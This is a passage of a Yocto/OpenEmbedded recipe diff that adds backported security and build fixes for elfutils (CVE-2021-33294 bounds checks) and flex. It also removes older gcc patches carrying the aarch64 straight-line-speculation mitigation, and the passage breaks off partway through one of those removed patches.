LICENSE = "GPLv2 & LGPLv3+ & GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -33,6 +34,7 @@ SRC_URI = "https://sourceware.org/elfutils/ftp/${PV}/${BP}.tar.bz2 \
file://0001-ppc_initreg.c-Incliude-asm-ptrace.h-for-pt_regs-defi.patch \
file://run-ptest \
file://ptest.patch \
+ file://CVE-2021-33294.patch \
"
SRC_URI_append_libc-musl = " \
file://0001-musl-obstack-fts.patch \
diff --git a/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
new file mode 100644
index 0000000000..0500a4cf83
--- /dev/null
+++ b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
@@ -0,0 +1,72 @@
+From 480b6fa3662ba8ffeee274bf0d37423413c01e55 Mon Sep 17 00:00:00 2001
+From: Mark Wielaard <mark@klomp.org>
+Date: Wed, 3 Mar 2021 21:40:53 +0100
+Subject: [PATCH] readelf: Sanity check verneed and verdef offsets in handle_symtab.
+
+We are going through vna_next, vn_next and vd_next in a while loop.
+Make sure that all offsets are sane. We don't want things to wrap
+around so we go in cycles.
+
+https://sourceware.org/bugzilla/show_bug.cgi?id=27501
+
+Signed-off-by: Mark Wielaard <mark@klomp.org>
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=elfutils.git;a=commit;h=480b6fa3662ba8ffeee274bf0d37423413c01e55]
+CVE: CVE-2021-33294
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/ChangeLog | 5 +++++
+ src/readelf.c | 10 +++++++++-
+ 2 files changed, 14 insertions(+), 1 deletion(-)
+
+diff --git a/src/ChangeLog b/src/ChangeLog
+index 6af977e..f0d9e39 100644
+--- a/src/ChangeLog
++++ b/src/ChangeLog
+@@ -1,3 +1,8 @@
++2021-03-03 Mark Wielaard <mark@klomp.org>
++
++ * readelf.c (handle_symtab): Sanity check verneed vna_next,
++ vn_next and verdef vd_next offsets.
++
+ 2019-11-26 Mark Wielaard <mark@klomp.org>
+
+ * Makefile.am (BUILD_STATIC): Add libraries needed for libdw.
+diff --git a/src/readelf.c b/src/readelf.c
+index 5994615..ab7a1c1 100644
+--- a/src/readelf.c
++++ b/src/readelf.c
+@@ -2550,7 +2550,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ &vernaux_mem);
+ while (vernaux != NULL
+ && vernaux->vna_other != *versym
+- && vernaux->vna_next != 0)
++ && vernaux->vna_next != 0
++ && (verneed_data->d_size - vna_offset
++ >= vernaux->vna_next))
+ {
+ /* Update the offset. */
+ vna_offset += vernaux->vna_next;
+@@ -2567,6 +2569,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ /* Found it. */
+ break;
+
++ if (verneed_data->d_size - vn_offset < verneed->vn_next)
++ break;
++
+ vn_offset += verneed->vn_next;
+ verneed = (verneed->vn_next == 0
+ ? NULL
+@@ -2602,6 +2607,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ /* Found the definition. */
+ break;
+
++ if (verdef_data->d_size - vd_offset < verdef->vd_next)
++ break;
++
+ vd_offset += verdef->vd_next;
+ verdef = (verdef->vd_next == 0
+ ? NULL
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
index b043c96543..ef5d83ebaf 100644
--- a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
+++ b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utility for modifying GPT disk partitioning"
DESCRIPTION = "GPT fdisk is a disk partitioning tool loosely modeled on Linux fdisk, but used for modifying GUID Partition Table (GPT) disks. The related FixParts utility fixes some common problems on Master Boot Record (MBR) disks."
+HOMEPAGE = "https://sourceforge.net/projects/gptfdisk/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=59530bdf33659b29e73d4adb9f9f6552"
diff --git a/meta/recipes-devtools/file/file_5.38.bb b/meta/recipes-devtools/file/file_5.38.bb
index 2d62ead10b..b19bf03986 100644
--- a/meta/recipes-devtools/file/file_5.38.bb
+++ b/meta/recipes-devtools/file/file_5.38.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;beginline=2;md5=0251eaec1188b20d9a72c502ecfdd
DEPENDS = "file-replacement-native"
DEPENDS_class-native = "bzip2-replacement-native"
-SRC_URI = "git://github.com/file/file.git"
+SRC_URI = "git://github.com/file/file.git;branch=master;protocol=https"
SRCREV = "ec41083645689a787cdd00cb3b5bf578aa79e46c"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch b/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch
new file mode 100644
index 0000000000..c8202b6bd5
--- /dev/null
+++ b/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch
@@ -0,0 +1,32 @@
+From 440f3f55739468cd26e22f31871eca8cbbd53294 Mon Sep 17 00:00:00 2001
+From: Oleksiy Obitotskyy <oobitots@cisco.com>
+Date: Wed, 6 Jan 2021 06:12:14 -0800
+Subject: [PATCH] Emit no #line directives if gen_line_dirs is false
+
+If we set --noline we should not print line directives.
+But setting --noline means gen_line_dirs is false.
+
+Upstream-Status: Submitted
+Signed-off-by: Oleksiy Obitotskyy <oobitots@cisco.com>
+---
+ src/buf.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/buf.c b/src/buf.c
+index 185083c..4439e28 100644
+--- a/src/buf.c
++++ b/src/buf.c
+@@ -95,8 +95,8 @@ struct Buf *buf_linedir (struct Buf *buf, const char* filename, int lineno)
+ const char *src;
+ size_t tsz;
+
+- if (gen_line_dirs)
+- return buf;
++ if (!gen_line_dirs)
++ return buf;
+
+ tsz = strlen("#line \"\"\n") + /* constant parts */
+ 2 * strlen (filename) + /* filename with possibly all backslashes escaped */
+--
+2.26.2.Cisco
+
diff --git a/meta/recipes-devtools/flex/flex/check-funcs.patch b/meta/recipes-devtools/flex/flex/check-funcs.patch
new file mode 100644
index 0000000000..762275e7f8
--- /dev/null
+++ b/meta/recipes-devtools/flex/flex/check-funcs.patch
@@ -0,0 +1,67 @@
+Subject: build: Move dnl comments out of AC_CHECK_FUNCS
+
+Due to a bug, autoheader (2.69) will treat M4 dnl comments in a quoted
+argument of AC_CHECK_FUNCS as function tokens and generate a lot of
+redundant and useless HAVE_* macros in config.h.in.
+(Examples: HAVE_DNL, HAVE_AVAILABLE_, HAVE_BY)
+
+It seems to be this commit dbb4e94dc7bacbcfd4acef4f085ef752fe1aa03f of
+mine that revealed this autoheader bug, and the affected config.h.in
+had been shipped within flex-2.6.4 release tarball.
+
+I have reported the autoheader bug here:
+<https://lists.gnu.org/archive/html/bug-autoconf/2018-02/msg00005.html>
+
+As a workaround, let's move comments out of AC_CHECK_FUNCS.
+
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+Signed-off-by: Kang-Che Sung <explorer09@gmail.com>
+Signed-off-by: Zang Ruochen <zangrc.fnst@cn.fujitsu.com>
+---
+ configure.ac | 28 +++++++++++++---------------
+ 1 file changed, 13 insertions(+), 15 deletions(-)
+
+diff --git a/configure.ac b/configure.ac
+index 55e774b..5ea3a93 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -153,21 +153,19 @@ AC_FUNC_REALLOC
+ AS_IF([test "$cross_compiling" = yes],
+ AC_MSG_WARN([result $ac_cv_func_realloc_0_nonnull guessed because of cross compilation]))
+
+-AC_CHECK_FUNCS([dup2 dnl
+-memset dnl
+-regcomp dnl
+-strcasecmp dnl
+-strchr dnl
+-strdup dnl
+-strtol dnl
+-], [], [AC_MSG_ERROR(required library function not found on your system)])
+-
+-# Optional library functions
+-AC_CHECK_FUNCS([dnl
+-pow dnl Used only by "examples/manual/expr"
+-setlocale dnl Needed only if NLS is enabled
+-reallocarray dnl OpenBSD function. We have replacement if not available.
+-])
++dnl Autoheader (<= 2.69) bug: "dnl" comments in a quoted argument of
++dnl AC_CHECK_FUNCS will expand wierdly in config.h.in.
++dnl (https://lists.gnu.org/archive/html/bug-autoconf/2018-02/msg00005.html)
++
++AC_CHECK_FUNCS([dup2 memset regcomp strcasecmp strchr strdup strtol], [],
++ [AC_MSG_ERROR(required library function not found on your system)])
++
++# Optional library functions:
++# pow - Used only by "examples/manual/expr".
++# setlocale - Needed only if NLS is enabled.
++# reallocarr - NetBSD function. Use reallocarray if not available.
++# reallocarray - OpenBSD function. We have replacement if not available.
++AC_CHECK_FUNCS([pow setlocale reallocarr reallocarray])
+
+ AC_CONFIG_FILES(
+ Makefile
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/flex/flex_2.6.4.bb b/meta/recipes-devtools/flex/flex_2.6.4.bb
index 43b2547fc6..50d3bf8de1 100644
--- a/meta/recipes-devtools/flex/flex_2.6.4.bb
+++ b/meta/recipes-devtools/flex/flex_2.6.4.bb
@@ -15,6 +15,8 @@ SRC_URI = "https://github.com/westes/flex/releases/download/v${PV}/flex-${PV}.ta
file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
${@bb.utils.contains('PTEST_ENABLED', '1', '', 'file://disable-tests.patch', d)} \
file://0001-build-AC_USE_SYSTEM_EXTENSIONS-in-configure.ac.patch \
+ file://check-funcs.patch \
+ file://0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch \
"
SRC_URI[md5sum] = "2882e3179748cc9f9c23ec593d6adc8d"
@@ -24,6 +26,11 @@ SRC_URI[sha256sum] = "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c4
UPSTREAM_CHECK_URI = "https://github.com/westes/flex/releases"
UPSTREAM_CHECK_REGEX = "flex-(?P<pver>\d+(\.\d+)+)\.tar"
+# Disputed - there is stack exhaustion, but no bug: it happens while building the
+# parser, not while running it, effectively similar to a compiler ICE. Upstream has no plans to address it:
+# https://github.com/westes/flex/issues/414
+CVE_CHECK_WHITELIST += "CVE-2019-6293"
+
inherit autotools gettext texinfo ptest
M4 = "${bindir}/m4"
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch b/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
deleted file mode 100644
index a7e29f4bd7..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
+++ /dev/null
@@ -1,204 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From 20da13e395bde597d8337167c712039c8f923c3b Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:58 +0100
-Subject: [PATCH 1/3] aarch64: New Straight Line Speculation (SLS) mitigation
- flags
-
-Here we introduce the flags that will be used for straight line speculation.
-
-The new flag introduced is `-mharden-sls=`.
-This flag can take arguments of `none`, `all`, or a comma seperated list
-of one or more of `retbr` or `blr`.
-`none` indicates no special mitigation of the straight line speculation
-vulnerability.
-`all` requests all mitigations currently implemented.
-`retbr` requests that the RET and BR instructions have a speculation
-barrier inserted after them.
-`blr` requests that BLR instructions are replaced by a BL to a function
-stub using a BR with a speculation barrier after it.
-
-Setting this on a per-function basis using attributes or the like is not
-enabled, but may be in the future.
-
-(cherry picked from commit a9ba2a9b77bec7eacaf066801f22d1c366a2bc86)
-
-gcc/ChangeLog:
-
-2020-06-02 Matthew Malcomson <matthew.malcomson@arm.com>
-
- * config/aarch64/aarch64-protos.h (aarch64_harden_sls_retbr_p):
- New.
- (aarch64_harden_sls_blr_p): New.
- * config/aarch64/aarch64.c (enum aarch64_sls_hardening_type):
- New.
- (aarch64_harden_sls_retbr_p): New.
- (aarch64_harden_sls_blr_p): New.
- (aarch64_validate_sls_mitigation): New.
- (aarch64_override_options): Parse options for SLS mitigation.
- * config/aarch64/aarch64.opt (-mharden-sls): New option.
- * doc/invoke.texi: Document new option.
----
- gcc/config/aarch64/aarch64-protos.h | 3 ++
- gcc/config/aarch64/aarch64.c | 76 +++++++++++++++++++++++++++++
- gcc/config/aarch64/aarch64.opt | 4 ++
- gcc/doc/invoke.texi | 12 +++++
- 4 files changed, 95 insertions(+)
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index c083cad53..31493f412 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -644,4 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
-
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
-
-+extern bool aarch64_harden_sls_retbr_p (void);
-+extern bool aarch64_harden_sls_blr_p (void);
-+
- #endif /* GCC_AARCH64_PROTOS_H */
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index b452a53af..269ff6c92 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -11734,6 +11734,79 @@ aarch64_validate_mcpu (const char *str, const struct processor **res,
- return false;
- }
-
-+/* Straight line speculation indicators. */
-+enum aarch64_sls_hardening_type
-+{
-+ SLS_NONE = 0,
-+ SLS_RETBR = 1,
-+ SLS_BLR = 2,
-+ SLS_ALL = 3,
-+};
-+static enum aarch64_sls_hardening_type aarch64_sls_hardening;
-+
-+/* Return whether we should mitigatate Straight Line Speculation for the RET
-+ and BR instructions. */
-+bool
-+aarch64_harden_sls_retbr_p (void)
-+{
-+ return aarch64_sls_hardening & SLS_RETBR;
-+}
-+
-+/* Return whether we should mitigatate Straight Line Speculation for the BLR
-+ instruction. */
-+bool
-+aarch64_harden_sls_blr_p (void)
-+{
-+ return aarch64_sls_hardening & SLS_BLR;
-+}
-+
-+/* As of yet we only allow setting these options globally, in the future we may
-+ allow setting them per function. */
-+static void
-+aarch64_validate_sls_mitigation (const char *const_str)
-+{
-+ char *token_save = NULL;
-+ char *str = NULL;
-+
-+ if (strcmp (const_str, "none") == 0)
-+ {
-+ aarch64_sls_hardening = SLS_NONE;
-+ return;
-+ }
-+ if (strcmp (const_str, "all") == 0)
-+ {
-+ aarch64_sls_hardening = SLS_ALL;
-+ return;
-+ }
-+
-+ char *str_root = xstrdup (const_str);
-+ str = strtok_r (str_root, ",", &token_save);
-+ if (!str)
-+ error ("invalid argument given to %<-mharden-sls=%>");
-+
-+ int temp = SLS_NONE;
-+ while (str)
-+ {
-+ if (strcmp (str, "blr") == 0)
-+ temp |= SLS_BLR;
-+ else if (strcmp (str, "retbr") == 0)
-+ temp |= SLS_RETBR;
-+ else if (strcmp (str, "none") == 0 || strcmp (str, "all") == 0)
-+ {
-+ error ("%<%s%> must be by itself for %<-mharden-sls=%>", str);
-+ break;
-+ }
-+ else
-+ {
-+ error ("invalid argument %<%s%> for %<-mharden-sls=%>", str);
-+ break;
-+ }
-+ str = strtok_r (NULL, ",", &token_save);
-+ }
-+ aarch64_sls_hardening = (aarch64_sls_hardening_type) temp;
-+ free (str_root);
-+}
-+
- /* Parses CONST_STR for branch protection features specified in
- aarch64_branch_protect_types, and set any global variables required. Returns
- the parsing result and assigns LAST_STR to the last processed token from
-@@ -11972,6 +12045,9 @@ aarch64_override_options (void)
- selected_arch = NULL;
- selected_tune = NULL;
-
-+ if (aarch64_harden_sls_string)
-+ aarch64_validate_sls_mitigation (aarch64_harden_sls_string);
-+
- if (aarch64_branch_protection_string)
- aarch64_validate_mbranch_protection (aarch64_branch_protection_string);
-
-diff --git a/gcc/config/aarch64/aarch64.opt b/gcc/config/aarch64/aarch64.opt
-index 3c6d1cc90..d27ab6df8 100644
---- a/gcc/config/aarch64/aarch64.opt
-+++ b/gcc/config/aarch64/aarch64.opt
-@@ -71,6 +71,10 @@ mgeneral-regs-only
- Target Report RejectNegative Mask(GENERAL_REGS_ONLY) Save
- Generate code which uses only the general registers.
-
-+mharden-sls=
-+Target RejectNegative Joined Var(aarch64_harden_sls_string)
-+Generate code to mitigate against straight line speculation.
-+
- mfix-cortex-a53-835769
- Target Report Var(aarch64_fix_a53_err835769) Init(2) Save
- Workaround for ARM Cortex-A53 Erratum number 835769.
-diff --git a/gcc/doc/invoke.texi b/gcc/doc/invoke.texi
-index 2f7ffe456..5f04a7d2b 100644
---- a/gcc/doc/invoke.texi
-+++ b/gcc/doc/invoke.texi
-@@ -638,6 +638,7 @@ Objective-C and Objective-C++ Dialects}.
- -mpc-relative-literal-loads @gol
- -msign-return-address=@var{scope} @gol
- -mbranch-protection=@var{none}|@var{standard}|@var{pac-ret}[+@var{leaf}]|@var{bti} @gol
-+-mharden-sls=@var{opts} @gol
- -march=@var{name} -mcpu=@var{name} -mtune=@var{name} @gol
- -moverride=@var{string} -mverbose-cost-dump @gol
- -mstack-protector-guard=@var{guard} -mstack-protector-guard-reg=@var{sysreg} @gol
-@@ -15955,6 +15956,17 @@ argument @samp{leaf} can be used to extend the signing to include leaf
- functions.
- @samp{bti} turns on branch target identification mechanism.
-
-+@item -mharden-sls=@var{opts}
-+@opindex mharden-sls
-+Enable compiler hardening against straight line speculation (SLS).
-+@var{opts} is a comma-separated list of the following options:
-+@table @samp
-+@item retbr
-+@item blr
-+@end table
-+In addition, @samp{-mharden-sls=all} enables all SLS hardening while
-+@samp{-mharden-sls=none} disables all SLS hardening.
-+
- @item -msve-vector-bits=@var{bits}
- @opindex msve-vector-bits
- Specify the number of bits in an SVE vector register. This option only has
---
-2.25.1
-
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch b/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
deleted file mode 100644
index c972088d2b..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
+++ /dev/null
@@ -1,600 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From dc586a749228ecfb71f72ec2ca10e6f7b6874af3 Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:59 +0100
-Subject: [PATCH 2/3] aarch64: Introduce SLS mitigation for RET and BR
- instructions
-
-Instructions following RET or BR are not necessarily executed. In order
-to avoid speculation past RET and BR we can simply append a speculation
-barrier.
-
-Since these speculation barriers will not be architecturally executed,
-they are not expected to add a high performance penalty.
-
-The speculation barrier is to be SB when targeting architectures which
-have this enabled, and DSB SY + ISB otherwise.
-
-We add tests for each of the cases where such an instruction was seen.
-
-This is implemented by modifying each machine description pattern that
-emits either a RET or a BR instruction. We choose not to use something
-like `TARGET_ASM_FUNCTION_EPILOGUE` since it does not affect the
-`indirect_jump`, `jump`, `sibcall_insn` and `sibcall_value_insn`
-patterns and we find it preferable to implement the functionality in the
-same way for every pattern.
-
-There is one particular case which is slightly tricky. The
-implementation of TARGET_ASM_TRAMPOLINE_TEMPLATE uses a BR which needs
-to be mitigated against. The trampoline template is used *once* per
-compilation unit, and the TRAMPOLINE_SIZE is exposed to the user via the
-builtin macro __LIBGCC_TRAMPOLINE_SIZE__.
-In the future we may implement function specific attributes to turn on
-and off hardening on a per-function basis.
-The fixed nature of the trampoline described above implies it will be
-safer to ensure this speculation barrier is always used.
-
-Testing:
- Bootstrap and regtest done on aarch64-none-linux
- Used a temporary hack(1) to use these options on every test in the
- testsuite and a script to check that the output never emitted an
- unmitigated RET or BR.
-
-1) Temporary hack was a change to the testsuite to always use
-`-save-temps` and run a script on the assembly output of those
-compilations which produced one to ensure every RET or BR is immediately
-followed by a speculation barrier.
-
-(cherry picked from be178ecd5ac1fe1510d960ff95c66d0ff831afe1)
-
-gcc/ChangeLog:
-
- * config/aarch64/aarch64-protos.h (aarch64_sls_barrier): New.
- * config/aarch64/aarch64.c (aarch64_output_casesi): Emit
- speculation barrier after BR instruction if needs be.
- (aarch64_trampoline_init): Handle ptr_mode value & adjust size
- of code copied.
- (aarch64_sls_barrier): New.
- (aarch64_asm_trampoline_template): Add needed barriers.
- * config/aarch64/aarch64.h (AARCH64_ISA_SB): New.
- (TARGET_SB): New.
- (TRAMPOLINE_SIZE): Account for barrier.
- * config/aarch64/aarch64.md (indirect_jump, *casesi_dispatch,
- simple_return, *do_return, *sibcall_insn, *sibcall_value_insn):
- Emit barrier if needs be, also account for possible barrier using
- "sls_length" attribute.
- (sls_length): New attribute.
- (length): Determine default using any non-default sls_length
- value.
-
-gcc/testsuite/ChangeLog:
-
- * gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c: New test.
- * gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c:
- New test.
- * gcc.target/aarch64/sls-mitigation/sls-mitigation.exp: New file.
- * lib/target-supports.exp (check_effective_target_aarch64_asm_sb_ok):
- New proc.
----
- gcc/config/aarch64/aarch64-protos.h | 1 +
- gcc/config/aarch64/aarch64.c | 41 +++++-
- gcc/config/aarch64/aarch64.h | 10 +-
- gcc/config/aarch64/aarch64.md | 75 ++++++++---
- .../sls-mitigation/sls-miti-retbr-pacret.c | 15 +++
- .../aarch64/sls-mitigation/sls-miti-retbr.c | 119 ++++++++++++++++++
- .../aarch64/sls-mitigation/sls-mitigation.exp | 73 +++++++++++
- gcc/testsuite/lib/target-supports.exp | 3 +-
- 8 files changed, 312 insertions(+), 25 deletions(-)
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index 31493f412..885eae893 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -644,6 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
-
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
-
-+const char *aarch64_sls_barrier (int);
- extern bool aarch64_harden_sls_retbr_p (void);
- extern bool aarch64_harden_sls_blr_p (void);
-
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index 269ff6c92..dff61105c 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -8412,8 +8412,8 @@ aarch64_return_addr (int count, rtx frame ATTRIBUTE_UNUSED)
- static void
- aarch64_asm_trampoline_template (FILE *f)
- {
-- int offset1 = 16;
-- int offset2 = 20;
-+ int offset1 = 24;
-+ int offset2 = 28;
-
- if (aarch64_bti_enabled ())
- {
-@@ -8436,6 +8436,17 @@ aarch64_asm_trampoline_template (FILE *f)
- }
- asm_fprintf (f, "\tbr\t%s\n", reg_names [IP1_REGNUM]);
-
-+ /* We always emit a speculation barrier.
-+ This is because the same trampoline template is used for every nested
-+ function. Since nested functions are not particularly common or
-+ performant we don't worry too much about the extra instructions to copy
-+ around.
-+ This is not yet a problem, since we have not yet implemented function
-+ specific attributes to choose between hardening against straight line
-+ speculation or not, but such function specific attributes are likely to
-+ happen in the future. */
-+ asm_fprintf (f, "\tdsb\tsy\n\tisb\n");
-+
- /* The trampoline needs an extra padding instruction. In case if BTI is
- enabled the padding instruction is replaced by the BTI instruction at
- the beginning. */
-@@ -8450,10 +8461,14 @@ static void
- aarch64_trampoline_init (rtx m_tramp, tree fndecl, rtx chain_value)
- {
- rtx fnaddr, mem, a_tramp;
-- const int tramp_code_sz = 16;
-+ const int tramp_code_sz = 24;
-
- /* Don't need to copy the trailing D-words, we fill those in below. */
-- emit_block_move (m_tramp, assemble_trampoline_template (),
-+ /* We create our own memory address in Pmode so that `emit_block_move` can
-+ use parts of the backend which expect Pmode addresses. */
-+ rtx temp = convert_memory_address (Pmode, XEXP (m_tramp, 0));
-+ emit_block_move (gen_rtx_MEM (BLKmode, temp),
-+ assemble_trampoline_template (),
- GEN_INT (tramp_code_sz), BLOCK_OP_NORMAL);
- mem = adjust_address (m_tramp, ptr_mode, tramp_code_sz);
- fnaddr = XEXP (DECL_RTL (fndecl), 0);
-@@ -8640,6 +8655,8 @@ aarch64_output_casesi (rtx *operands)
- output_asm_insn (buf, operands);
- output_asm_insn (patterns[index][1], operands);
- output_asm_insn ("br\t%3", operands);
-+ output_asm_insn (aarch64_sls_barrier (aarch64_harden_sls_retbr_p ()),
-+ operands);
- assemble_label (asm_out_file, label);
- return "";
- }
-@@ -18976,6 +18993,22 @@ aarch64_file_end_indicate_exec_stack ()
- #undef GNU_PROPERTY_AARCH64_FEATURE_1_BTI
- #undef GNU_PROPERTY_AARCH64_FEATURE_1_AND
-
-+/* Helper function for straight line speculation.
-+ Return what barrier should be emitted for straight line speculation
-+ mitigation.
-+ When not mitigating against straight line speculation this function returns
-+ an empty string.
-+ When mitigating against straight line speculation, use:
-+ * SB when the v8.5-A SB extension is enabled.
-+ * DSB+ISB otherwise. */
-+const char *
-+aarch64_sls_barrier (int mitigation_required)
-+{
-+ return mitigation_required
-+ ? (TARGET_SB ? "sb" : "dsb\tsy\n\tisb")
-+ : "";
-+}
-+
- /* Target-specific selftests. */
-
- #if CHECKING_P
-diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
-index 772a97296..72ddc6fd9 100644
---- a/gcc/config/aarch64/aarch64.h
-+++ b/gcc/config/aarch64/aarch64.h
-@@ -235,6 +235,7 @@ extern unsigned aarch64_architecture_version;
- #define AARCH64_ISA_F16FML (aarch64_isa_flags & AARCH64_FL_F16FML)
- #define AARCH64_ISA_RCPC8_4 (aarch64_isa_flags & AARCH64_FL_RCPC8_4)
- #define AARCH64_ISA_V8_5 (aarch64_isa_flags & AARCH64_FL_V8_5)
-+#define AARCH64_ISA_SB (aarch64_isa_flags & AARCH64_FL_SB)
-
- /* Crypto is an optional extension to AdvSIMD. */
- #define TARGET_CRYPTO (TARGET_SIMD && AARCH64_ISA_CRYPTO)
-@@ -285,6 +286,9 @@ extern unsigned aarch64_architecture_version;
- #define TARGET_FIX_ERR_A53_835769_DEFAULT 1
- #endif
-
-+/* SB instruction is enabled through +sb. */
-+#define TARGET_SB (AARCH64_ISA_SB)
-+
- /* Apply the workaround for Cortex-A53 erratum 835769. */
- #define TARGET_FIX_ERR_A53_835769 \
- ((aarch64_fix_a53_err835769 == 2) \
-@@ -931,8 +935,10 @@ typedef struct
-
- #define RETURN_ADDR_RTX aarch64_return_addr
-
--/* BTI c + 3 insns + 2 pointer-sized entries. */
--#define TRAMPOLINE_SIZE (TARGET_ILP32 ? 24 : 32)
-+/* BTI c + 3 insns
-+ + sls barrier of DSB + ISB.
-+ + 2 pointer-sized entries. */
-+#define TRAMPOLINE_SIZE (24 + (TARGET_ILP32 ? 8 : 16))
-
- /* Trampolines contain dwords, so must be dword aligned. */
- #define TRAMPOLINE_ALIGNMENT 64
-diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
-index cc5a887d4..494aee964 100644
---- a/gcc/config/aarch64/aarch64.md
-+++ b/gcc/config/aarch64/aarch64.md
-@@ -331,10 +331,25 @@
- ;; Attribute that specifies whether the alternative uses MOVPRFX.
- (define_attr "movprfx" "no,yes" (const_string "no"))
-
-+;; Attribute to specify that an alternative has the length of a single
-+;; instruction plus a speculation barrier.
-+(define_attr "sls_length" "none,retbr,casesi" (const_string "none"))
-+
- (define_attr "length" ""
- (cond [(eq_attr "movprfx" "yes")
- (const_int 8)
-- ] (const_int 4)))
-+
-+ (eq_attr "sls_length" "retbr")
-+ (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 4)
-+ (match_test "TARGET_SB") (const_int 8)]
-+ (const_int 12))
-+
-+ (eq_attr "sls_length" "casesi")
-+ (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 16)
-+ (match_test "TARGET_SB") (const_int 20)]
-+ (const_int 24))
-+ ]
-+ (const_int 4)))
-
- ;; Strictly for compatibility with AArch32 in pipeline models, since AArch64 has
- ;; no predicated insns.
-@@ -370,8 +385,12 @@
- (define_insn "indirect_jump"
- [(set (pc) (match_operand:DI 0 "register_operand" "r"))]
- ""
-- "br\\t%0"
-- [(set_attr "type" "branch")]
-+ {
-+ output_asm_insn ("br\\t%0", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ [(set_attr "type" "branch")
-+ (set_attr "sls_length" "retbr")]
- )
-
- (define_insn "jump"
-@@ -657,7 +676,7 @@
- "*
- return aarch64_output_casesi (operands);
- "
-- [(set_attr "length" "16")
-+ [(set_attr "sls_length" "casesi")
- (set_attr "type" "branch")]
- )
-
-@@ -736,14 +755,18 @@
- [(return)]
- ""
- {
-+ const char *ret = NULL;
- if (aarch64_return_address_signing_enabled ()
- && TARGET_ARMV8_3
- && !crtl->calls_eh_return)
-- return "retaa";
--
-- return "ret";
-+ ret = "retaa";
-+ else
-+ ret = "ret";
-+ output_asm_insn (ret, operands);
